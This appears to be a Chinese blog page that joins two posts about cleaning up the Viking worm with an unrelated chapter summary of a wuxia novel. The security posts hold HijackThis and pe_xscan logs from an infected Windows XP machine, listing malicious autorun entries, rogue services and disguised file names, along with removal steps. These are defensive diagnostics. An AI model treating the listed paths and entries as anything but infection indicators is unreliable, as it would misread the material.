O4 - 启动项HKCU\\Run: [gf73z81wd] E:\DOCUME~1\meng\LOCALS~1\Temp\servicer.exe
O4 - 启动项HKCU\\Run: [2zgemexrk] E:\DOCUME~1\meng\LOCALS~1\Temp\c0nime.exe

O23 - NT 服务: internet - Unknown owner - E:\WINDOWS\nntv.exe

O23 - NT 服务: Workstation - Unknown owner - E:\WINDOWS\services.exe

看到O4组的启动项，有一些和前天中了Worm.Viking.pk的网友的电脑中发现的相似。见：

昨天才提醒，今天就有网友点QQ信息中的网址，中Worm.Viking.pk了
http://endurer.bokee.com/6174316.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/20/1535711.aspx
http://blog.i0778.com/?1314/action_viewspace_itemid_2810.html

修复建议：

(下列修复操作可参考【系统修复系列之】基本操作索引　
http://endurer.blogchina.com/2591241.html）

重启电脑到安全模式

停止并禁用服务：
internet
Workstation

用WinRAR找到文件：

E:\WINDOWS\winform.exe
E:\WINDOWS\cmdbcs.exe
E:\WINDOWS\wsttrs.exe
C:\windows\baba.exe
E:\WINDOWS\servicea.exe
E:\WINDOWS\iexpl0ra.exe
E:\WINDOWS\c0nima.exe
E:\DOCUME~1\meng\LOCALS~1\Temp\servicer.exe
E:\DOCUME~1\meng\LOCALS~1\Temp\c0nime.exe
E:\WINDOWS\nntv.exe
E:\WINDOWS\services.exe

打包备份后删除。

用HijackThis修复上列可疑项

清空IE临时文件夹

清空 c:\windows\prefetch

重启电脑，把 E:\WINDOWS\services.exe 等文件的压缩包作为email附件发到endurer@163.com。

大侠狄龙子 7回3 概要 endurer评注施家兄妹逐走帅大娘痴心文麟比评意中人

第七回(3)
止水忽生波　人似孤鸾　空嗟丽质
三生曾有约　心同流水　不恋落花

　　帅大娘说自己是带男女七人追赶到此，大黄专一与自己作对。
　　施女说大黄原是南荒异兽，与杀母的两条毒蟒拼命，为裘芷仙杀蟒救下，雌雄两个只带回一个。前数日才命它移居方才山洞之内，就便防守。帅大娘原是蔡三姑的远亲，专一欺人。去年施女因帅大娘和三姑几乎反目，后经本山隐居的冯老头居中说和，只以这片树林为界。
　　施家兄妹将帅大娘逐走，邀文麟去寒萼谷中小住。施兄说沈煌现在白云窝慧昙神尼，与李明霞已然会。大黄去冯家窥探，因被冯家两个来客误认山中野兽，把那两人收拾得死去活来方始回转。冯家老头寻施家兄妹理论。说蔡三姑除是二婚、人太放荡外，平日无什过分恶迹。文麟若有是意不妨回去，否则住在这里或可无事，一回茅篷蔡三姑必寻来。
　　文麟说自己志在山林。司徒平、秦寒萼经过，施女追上请示求助，二老未置可否。
　　进屋后，文麟说了经过，见施女言动大方，自然娴雅，发言赞赏，发现施兄站在身后微笑，急得脸红窘愧。
　　施女问自己比淑华如何。文麟说淑华也许不如施女这等天人颜色，但二人情深交厚，自觉一时瑜亮，难分轩轾。

endurer评注

大黄原是南荒异兽，不知与神尼心陀（木师姑慧）的金星神猱相比如何。
想不到裘芷仙和罗鹭（见《青城十九侠》）这一对也在人间。
不知施女问文麟自己比淑华如何，是何用意。

［兽］大黄：那东西生得似人非人，仿佛猩猩、猿猴一类，偏又身子瘦长，与传说中的山魈相似，却生着两条瘦硬如铁蒲扇大的怪爪，周身细毛蒙茸，油光水滑，脑后一股长发下垂至股，却是色如金丝，又长又亮，这时正站在胖妇身后，怒瞪着一双火眼，两双利爪已然扬起，似看主人神色，只一发令，立将胖妇抓死神气，看去凶猛已极。……原是南荒异兽……这东西刚生不久，不过二尺来高……和蟒一样，禀性太恶，难于驯养……虽是天生恶物，心却灵巧，居然知恩感德，终日守伺洞前，我一出外，便追随在侧，不肯离开，……这东西倒也听话，除喜捉弄恶人而外，不奉我命从不伤人。就这样，家父仍然嫌它性暴多事，时常鞭打，它从来不敢倔强。新近为了本山时有外方恶贼狗盗来此窥伺，附近又有几处凶人，我因家父母长年清修，不愿外人惊扰，前数日才命它移居方才山洞之内，就便防守。对它更有严命，虽不许生人入境，但也不许它离开这片树林。……天性凶野，稍微纵容便喜惹事……性喜清洁，行动又快，住洞之时极少

［人］裘芷仙：罗叔母裘芷仙为人温和，原是峨眉派剑侠，与家父母同门至好

［人］帅大娘：原是蔡三姑的远亲，仗着几斤蛮力，专一欺人。

［人］蔡三姑：乃是个杀人不眨眼的女魔王，虽然看中周兄，起了邪心，但她生性强做，自从和她丈夫离异，求偶三年，均在暗中物色。那些闻风而来的江湖上无耻之徒，被她欺侮凌辱的不知多少，有的还成了残废。此女一向高自位置，忽对周兄俯就，分明心爱太甚，非得到手不可，周兄回去就她自可无事，只一坚拒，势必恼羞成怒，深仇不解。此女亡父是一侠盗，父女均精剑术，除却是个二婚、人太放荡而外，平日倒也无什过分恶迹。……生得肤如凝脂，人甚秀媚，并非不美，只不知何故，令人望而生厌

［人］秦寒萼：那女的丰神美艳，望之若仙，飘然有出尘之致，看年纪似和施女相同，决分不出谁大谁小，

［人］施女：……更显得丰神美艳，端丽若仙……言动大方，不作丝毫儿女子态，偏是容光照人，自然娴雅，令人生出一种可亲可敬之意。……如天上神仙，不带丝毫烟火气，最难得是仪态万方，美绝大人，偏是那么自然端重……最恨人假道学，居心却不可问

［典］刘桢平视：《三国志·魏书·刘桢传》注记：“其后太子尝请诸文学，酒酣坐欢，命夫人甄氏出拜。坐中众人咸伏；而桢独平视。太祖闻之，乃收桢，减死输作。”刘桢因为看绝色美人看得太入迷，以致引起曹操不快而下了牢狱。

旧雨楼·还珠楼主《大侠狄龙子》全文

昨天才提醒，今天就有网友点QQ信息中的网址，中Worm.Viking.pk了

endurer 原创

2007-03-20 第1版

昨天才提醒大家小心QQ信息中的网址会传播维金/Viking等病毒：

小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
http://endurer.bokee.com/6171794.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/19/1534201.aspx
http://blog.sina.com.cn/u/49926d91010007zy
http://blog.i0778.com/?1314/action_viewspace_itemid_2795.html

想不到今天就有一位网友中标了。N多病毒，偶都不愿打包了。

pe_xscan 和 HijackThis 的log中也只包含了其中的一部分而已。

先把pe_xscan 和 HijackThis 的log。明天再细述。

pe_xscan 07-03-17 by Purple Endurer
2007-3-20 17:0:26
Windows XP Service Pack 1(5.1.2600)
管理员用户组
[System Process] * 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HZBCNCMU\3[1].exe 2007-3-20 16:47:34
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll 2003-3-15 0:0:0
C:\WINDOWS\System32\Qqzos.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy1.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav30.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Msxo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0r.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gjzo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Wmzo0.dll 2003-3-15 0:0:0
C:\WINDOWS\system32\svchost.exe * 840 2003-3-15 0:0:0 Microsoft? Windows? Operating System 5.1.2600.0 Generic Host Process for Win32 Services ? Microsoft Corporation. All rights reserved. 5.1.2600.0 (xpclient.010817-1148) Microsoft Corporation ? svchost.exe svchost.exe
C:\WINDOWS\System32\cdnns.dll 2007-3-20 10:47:16 CNNIC cdnns 2, 0, 0, 0 cdnns Copyright ? 2005 2, 0, 0, 0 CNNIC cdnns cdnns.dll
C:\WINDOWS\Explorer.exe * 1396 2003-3-15 0:0:0 Microsoft(R) Windows(R) Operating System 6.00.2800.1106 Windows Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2800.1106 (xpsp1.020828-1920) Microsoft Corporation ? explorer EXPLORER.EXE
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-3-20 15:16:42
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-3-20 15:9:36
C:\WINDOWS\System32\ntd11.dll 2007-3-19 14:16:54 1.0.0.0 1.1.1.150
C:\WINDOWS\System32\cdnns.dll 2007-3-20 10:47:16 CNNIC cdnns 2, 0, 0, 0 cdnns Copyright ? 2005 2, 0, 0, 0 CNNIC cdnns cdnns.dll

C:\Program Files\Thunder Network\Thunder\ComDlls\XunLeiBHO_006.dll 2006-11-24 0:42:22 XunLeiBHO Module 5, 0, 0, 3 XunLeiBHO Copyright 2004-2006 5, 0, 0, 3 Thunder Networking Technologies,LTD XunLeiBHO XunLeiBHO.dll
C:\Program Files\Thunder Network\Thunder\ComDlls\ThunderAgent_005.dll 2006-11-6 16:56:50 ThunderAgent Module 1, 0, 0, 11 ThunderAgent Module Copyright 2005-2006 1, 0, 0, 11 Thunder Networking Technologies,LTD ThunderAgent ThunderAgent.DLL
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll 2003-3-15 0:0:0
C:\WINDOWS\System32\Qqzos.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy1.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav30.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Msxo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gjzo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0r.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Wmzo0.dll 2003-3-15 0:0:0
C:\PROGRA~1\一起搜\tbu08947\tbhelper.dll 2007-3-19 14:35:16 IE Toolbar 3.0.1.0 IE Toolbar Helper Module Copyright ? 2001-2007. All rights reserved. 3, 0, 1, 56 tbhelper tbhelper.dll

C:\WINDOWS\System32\conime.exe * 1876 2003-3-15 0:0:0 Microsoft? Windows? Operating System 5.1.2600.1106 Console IME ? Microsoft Corporation. All rights reserved. 5.1.2600.1106 (xpsp1.020828-1920) Microsoft Corporation ? Console CONIME.EXE
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\WINDOWS\System32\ctfmon.exe * 1940 2003-3-15 0:0:0 Microsoft? Windows? Operating System 5.1.2600.1106 CTF Loader ? Microsoft Corporation. All rights reserved. 5.1.2600.1106 (xpsp1.020828-1920) Microsoft Corporation ? CTFMON CTFMON.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\WINDOWS\servicer.exe * 952 2003-3-15 0:0:0
C:\WINDOWS\servicer.exe 2003-3-15 0:0:0
C:\WINDOWS\System32\Qqzos.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\byetmr.exe * 1696 2007-3-20 16:48:52 Microsoft(R) Windows(R) Operating System 5.1.2600.0 Windows Calculator application file (C) Microsoft Corporation. All rights reserved. 5.1.2600.0 (xpclient.010817-1148) Microsoft Corporation ? CALC CALC.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\byetmr.exe 2007-3-20 16:48:52 Microsoft(R) Windows(R) Operating System 5.1.2600.0 Windows Calculator application file (C) Microsoft Corporation. All rights reserved. 5.1.2600.0 (xpclient.010817-1148) Microsoft Corporation ? CALC CALC.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\WINDOWS\System32\cdnns.dll 2007-3-20 10:47:16 CNNIC cdnns 2, 0, 0, 0 cdnns Copyright ? 2005 2, 0, 0, 0 CNNIC cdnns cdnns.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\packet.dll 2007-3-20 16:48:52 WinPcap low level packet library 3, 1, 0, 27 Packet Copyright ? 1999-2005 NetGroup, Politecnico di Torino. Copyright ? 2005 CACE Technologies 3, 1, 0, 27 CACE Technologies Packet Packet.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\WanPacket.dll 2007-3-20 16:48:52 WinPcap low level NetMon wrapper library 3, 1, 0, 27 WanPacket Copyright ? 2005 CACE Technologies. Copyright ? 2003-2005 NetGroup, Politecnico di Torino. 3, 1, 0, 27 CACE Technologies WanPacket WanPacket.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NPPTools.dll 2007-3-20 16:48:52 Microsoft(R) Windows(R) Operating System 5.1.2600.2180 NPP Tools Helper DLL (C) Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? NPPTools.DLL NPPTools.DLL
C:\WINDOWS\System32\npp\ndisnpp.dll 2003-3-15 0:0:0 Microsoft? Windows? Operating System 5.1.2600.1106 Network Monitor NDIS Network Packet Provider ? Microsoft Corporation. All rights reserved. 5.1.2600.1106 (xpsp1.020828-1920) Microsoft Corporation ? NDISNPP.DLL NDISNPP.DLL
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sl.exe * 1908 2007-3-20 16:49:2
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sl.exe 2007-3-20 16:49:2
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\WINDOWS\System32\SVCH0ST.EXE * 1128 2003-3-15 0:0:0
C:\WINDOWS\System32\SVCH0ST.EXE 2003-3-15 0:0:0
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\Program Files\Internet Explorer\IEXPLORE.EXE * 240 2003-3-15 8:0:0 Microsoft(R) Windows(R) Operating System 6.00.2800.1106 Internet Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2800.1106 (xpsp1.020828-1920) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\System32\cdnns.dll 2007-3-20 10:47:16 CNNIC cdnns 2, 0, 0, 0 cdnns Copyright ? 2005 2, 0, 0, 0 CNNIC cdnns cdnns.dll
C:\Program Files\Common Files\System\ado\msado15.dll 2003-3-15 8:0:0 Microsoft Data Access Components 2.71.9030.0 Microsoft Data Access - ActiveX Data Objects Copyright ? Microsoft Corp. 1993-2001 2.71.9030.0 Microsoft Corporation Windows(TM) is a trademark of Microsoft Corporation. Microsoft? is a registered trademark of Microsoft Corporation ADO15 msado15.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-3-20 15:16:42
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-3-20 15:9:36
C:\WINDOWS\System32\ctfmon.exe * 308 2003-3-15 0:0:0 Microsoft? Windows? Operating System 5.1.2600.1106 CTF Loader ? Microsoft Corporation. All rights reserved. 5.1.2600.1106 (xpsp1.020828-1920) Microsoft Corporation ? CTFMON CTFMON.EXE
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-3-20 15:16:42
C:\WINDOWS\Logo1_.exe * 740 2007-3-20 16:56:50
C:\WINDOWS\Logo1_.exe 2007-3-20 16:56:50
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~I7PRUGI1VAC.CoM * 988 2007-3-20 16:57:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~I7PRUGI1VAC.CoM 2007-3-20 16:57:0
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-3-20 15:16:42
C:\WINDOWS\system32\notepad.exe * 1236 2003-3-15 0:0:0 Microsoft(R) Windows(R) Operating System 5.1.2600.0 记事本 (C) Microsoft Corporation. All rights reserved. 5.1.2600.0 (xpclient.010817-1148) Microsoft Corporation ? Notepad NOTEPAD.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-3-18 8:24:20
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-3-20 15:9:36
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-3-20 15:9:38
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Wmzo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0r.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gjzo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Msxo0.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav30.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy1.dll 2003-3-15 0:0:0
C:\WINDOWS\System32\Qqzos.dll 2003-3-15 0:0:0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll 2003-3-15 0:0:0

R3 - URLSearchHook: ToolbarURLSearchHook Class - {CA3EB689-8F09-4026-AA10-B9534C691CE0} - C:\PROGRA~1\一起搜\tbu08947\tbhelper.dll
F2 - REG:system.ini: Shell=Explorer.exe realshed.exe
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\System32\winsys16_070319.dll start

O2 - BHO CAdLogic Object - {11F09AFD-75AD-4E51-AB43-E09E9351CE16} - C:\Program Files\Common Files\CPUSH\cpush.dll
O2 - BHO Cbho Object - {352E3B3A-CAB5-4DBC-B940-C7F84D0447D8} - C:\PROGRA~1\CNNIC\Cdn\cdndrag.dll
O2 - BHO Info cache - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} - C:\Documents and Settings\All Users\Application Data\Microsoft\PCTools\pctools.dll
O2 - BHO C:\Documents and Settings\All Users\Application Data\Microsoft\PCTools\pctools.dll - {5B02EBA1-EFDD-477D-A37F-05383165C9C0} -
O2 - BHO CdnForIE Class - {5C3853CF-C7E0-4946-B3FA-1ABDB6F48108} - C:\PROGRA~1\CNNIC\Cdn\cdnforie.dll
O2 - BHO IEExt Class - {634539A8-7FA8-45E2-8DC3-253AF98548A1} - C:\WINDOWS\system\MFS0FT.DLL
O2 - BHO 实用搜索 - {6CFD436C-7AAD-4e50-992F-C0C87A94CAD2} - C:\Program Files\superutilbar\superutilbar.dll
O2 - BHO HrefRedirect Class - {74BC093A-540E-4340-897B-4653A8EB2F47} - C:\WINDOWS\System32\mslink\mslink.dll
O2 - BHO SysShellKernel Class - {E04B27AA-3973-4D68-8F42-B7C2FC8C6CF7} - C:\WINDOWS\System32\SysShellKernel.dll
O2 - BHO WMHlprObj Class - {F5824EFB-728A-4726-A5A5-85A68B20EDC3} - C:\PROGRA~1\CNNIC\Cdn\wmhlpr.dll
O2 - BHO TBSB04694 Class - {F943309C-4AF4-4D85-8064-FD20184B99EA} - C:\PROGRA~1\一起搜\tbu08947\cneqiso.dll

O3 - IE工具栏: 实用搜索工具条2.0 - {03465FF5-00AE-411a-9C34-960ED566EC03} - C:\Program Files\superutilbar\superutilbar.dll
O3 - IE工具栏: - {5558D3F3-87EB-4335-BE71-C6E8E468D166} - C:\Program Files\一起搜\tbu08947\cneqiso.dll

O4 - HKCR\..\Run: [ST0RMSetEx] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\system\AV1CAP.dll,Run
O4 - HKCR\..\Run: [svc] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\byetmr.exe
O4 - HKCR\..\Run: [ravshell] C:\WINDOWS\System32\SVCH0ST.EXE
O4 - HKCR\..\Run: [uv4vmwwc0] C:\WINDOWS\servicea.exe
O4 - HKCR\..\Run: [miie7b7y1t51my] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlog0n.exe
O4 - HKCR\..\Run: [r9k5] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexpl0re.exe
O4 - HKCR\..\Run: [hvygr0xm] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Servere.exe
O4 - HKCR\..\Run: [v55rkqmt6qgx4] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\crasos.exe
O4 - HKCR\..\Run: [c7kx] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe
O4 - HKCR\..\Run: [e5dms3e6] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c0nime.exe
O4 - HKCR\..\Run: [1hg1t6] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexp1ore.exe
O4 - HKCR\..\Run: [2969suv11ri9] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cftmon.exe
O4 - HKLM\..\Run: [System] C:\Program Files\Common Files\System\Updaterun.exe
O4 - HKLM\..\Run: [CdnCtr] C:\Program Files\CNNIC\Cdn\cdnup.exe
O4 - HKLM\..\Run: [load] C:\WINDOWS\uninstall\rundl132.exe
O4 - HKLM\..\Run: [wtsttrs] C:\WINDOWS\wtsttrs.exe
O4 - HKLM\..\Run: [cmdbgcs] C:\WINDOWS\cmdbgcs.exe
O4 - HKLM\..\Run: [mppds] C:\WINDOWS\mppds.exe
O4 - HKLM\..\Run: [msccrt] C:\WINDOWS\msccrt.exe
O4 - HKLM\..\Run: [mhs3] C:\WINDOWS\mhs3.exe
O4 - HKLM\..\Run: [cmdbcs] C:\WINDOWS\cmdbcs.exe
O4 - HKLM\..\Run: [upxdnd] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\TIMPLATF0RM.exe
O4 - HKLM\..\Run: [wgs3] C:\WINDOWS\wgs3.exe
O4 - HKLM\..\Run: [wsttrs] C:\WINDOWS\wsttrs.exe
O4 - HKLM\..\Run: [FYNEWS] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sl.exe

O4 - Global Startup: WanSo.lnk ->

O8 - IE右键菜单附加项 : 访问通用网址 - C:\Program Files\CNNIC\Cdn\cnnic.htm

O21 - SSODL - nvwi(Windows nvwi Theme) - {D0A6302C-859C-471E-9082-6B865C0ACAA2} = C:\PROGRA~1\muvh\nvwi.dll

O23 - 服务: 7A04BC6 (7A04BC6) - C:\WINDOWS\System32\7A04BC6.EXE -service 2007-3-20 14:59:36 Microsoft(R) Windows(R) Operating System 5.2.3790.1830 ASN.2 Runtime APIs (C) Microsoft Corporation. All rights reserved. 5.2.3790.1830 Microsoft Corporation ? ? ?(自动)

O23 - 服务: bcjhjgfi (bcjhjgfi) - system32\drivers\bcjhjgfi.sys(引导)

O23 - 服务: bkvtszv () - C:\WINDOWS\System32\svchost.exe -k netsvcs -> C:\PROGRA~1\COMMON~1\okvtyzv\okvtyzv.dll 2007-3-20 10:50:36 2, 8, 0, 1 2, 8, 0, 1 (自动)

O23 - 服务: cdntran (cdntran) - system32\drivers\cdntran.sys CNNIC cdntran 2, 6, 0, 0 cdntran Copyright ? 2005 2, 6, 0, 0 CNNIC cdntran cdntran.sys(自动)

O23 - 服务: D0622BED (D0622BED) - C:\WINDOWS\System32\D0622BED.EXE -service 2007-3-20 15:1:2 Microsoft(R) Windows(R) Operating System 5.2.3790.1830 ASN.2 Runtime APIs (C) Microsoft Corporation. All rights reserved. 5.2.3790.1830 Microsoft Corporation ? ? ?(自动)

O23 - 服务: MOBILL (Windows Install Helper) - C:\WINDOWS\SYSTEM32\RUNDLL2000.EXE C:\WINDOWS\SYSTEM32\WBEM\OZCJI.DLL,Export 1087(自动)

O23 - 服务: Navoct () - C:\WINDOWS\System32\svchost.exe -k netsvcs -> C:\Program Files\iesnap\navoct.dll 2007-3-12 10:28:46 NAVOCT 1, 0, 1, 1 NAVOCT Module Copyright 2006 1, 0, 1, 1 NAVOCT NAVOCT.DLL(自动)

O23 - 服务: Net Event (Net Event) - C:\WINDOWS\system32\netevent.exe 2007-3-20 10:46:44(自动)

O23 - 服务: NPF (Netgroup Packet Filter) - System32\DRIVERS\npf.sys WinPcap Netgroup Packet Filter Driver 3, 1, 0, 27 npf Copyright ? 2005 CACE Technologies. Copyright ? 2003-2005 NetGroup, Politecnico di Torino. 3, 1, 0, 27 CACE Technologies NPF + TME npf.sys(手动)

O23 - 服务: pxyk (Std pxyk Service) - C:\WINDOWS\System32\rundll32.exe C:\PROGRA~1\hptc\usdp.dll,Service -s(自动)

O23 - 服务: REM0TEREGISTRY (REM0TE REGISTRY) - C:\WINDOWS\system\REM0REG.EXE 2007-3-20 10:45:38(自动)

O23 - 服务: WebPrint (WebPrint) - c:\windows\system32\webprint.exe 2007-3-20 15:7:20 Microsoft Web Printer 5.2600.2180 Microsoft Web Printer C) Microsoft Corporation. All rights reserved. 5.2600.2180 Microsoft Corporation ? WEBPNT WEBPNT.EXE(自动)

O23 - 服务: Windows Login (Windows Login) - C:\WINDOWS\System32\mslogin.exe 2007-3-20 10:46:38(自动)

O24 - [] - {A6011F8F-A7F8-49AA-9ADA-49127D43138F} = C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk
O24 - [] - {754FB7D8-B8FE-4810-B363-A788CD060F1F} = C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys
O24 - [] - {99F1D023-7CEB-4586-80F7-BB1A98DB7602} = C:\Program Files\Internet Explorer\IEXPLORE.Sys
O24 - [] - {FEB94F5A-69F3-4645-8C2B-9E71D270AF2E} = C:\Program Files\Internet Explorer\IEXPLORE.Dat
O24 - [] - {923509F1-45CB-4EC0-BDE0-1DED35B8FD60} = C:\Program Files\Internet Explorer\IEXPLORE.win

***************************

Logfile of HijackThis v1.99.1
Scan saved at 18:20:11, on 2007-3-20
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\SVCH0ST.EXE

R3 - URLSearchHook: ToolbarURLSearchHook Class - {CA3EB689-8F09-4026-AA10-B9534C691CE0} - C:\PROGRA~1\一起搜\tbu08947\tbhelper.dll (file missing)
F2 - REG:system.ini: Shell=Explorer.exe realshed.exe
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\System32\winsys16_070319.dll start
O2 - BHO: AdPopup - {11F09AFD-75AD-4E51-AB43-E09E9351CE16} - C:\Program Files\Common Files\CPUSH\cpush.dll
O2 - BHO: CNNIC 网络工具Drag - {352E3B3A-CAB5-4DBC-B940-C7F84D0447D8} - C:\PROGRA~1\CNNIC\Cdn\cdndrag.dll
O2 - BHO: Info cache - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} - C:\Documents and Settings\All Users\Application Data\Microsoft\PCTools\pctools.dll
O2 - BHO: (no name) - {5B02EBA1-EFDD-477D-A37F-05383165C9C0} - (no file)
O2 - BHO: CdnForIE Class - {5C3853CF-C7E0-4946-B3FA-1ABDB6F48108} - C:\PROGRA~1\CNNIC\Cdn\cdnforie.dll
O2 - BHO: IEExt Class - {634539A8-7FA8-45E2-8DC3-253AF98548A1} - C:\WINDOWS\system\MFS0FT.DLL
O2 - BHO: 实用搜索 - {6CFD436C-7AAD-4e50-992F-C0C87A94CAD2} - C:\Program Files\superutilbar\superutilbar.dll
O2 - BHO: mslogin linker - {74BC093A-540E-4340-897B-4653A8EB2F47} - C:\WINDOWS\System32\mslink\mslink.dll
O2 - BHO: SysShellKernel - {E04B27AA-3973-4D68-8F42-B7C2FC8C6CF7} - C:\WINDOWS\System32\SysShellKernel.dll
O2 - BHO: WMHlprObj Class - {F5824EFB-728A-4726-A5A5-85A68B20EDC3} - C:\PROGRA~1\CNNIC\Cdn\wmhlpr.dll
O2 - BHO: TBSB04694 - {F943309C-4AF4-4D85-8064-FD20184B99EA} - C:\PROGRA~1\一起搜\tbu08947\cneqiso.dll (file missing)
O3 - Toolbar: 实用搜索工具条2.0 - {03465FF5-00AE-411a-9C34-960ED566EC03} - C:\Program Files\superutilbar\superutilbar.dll
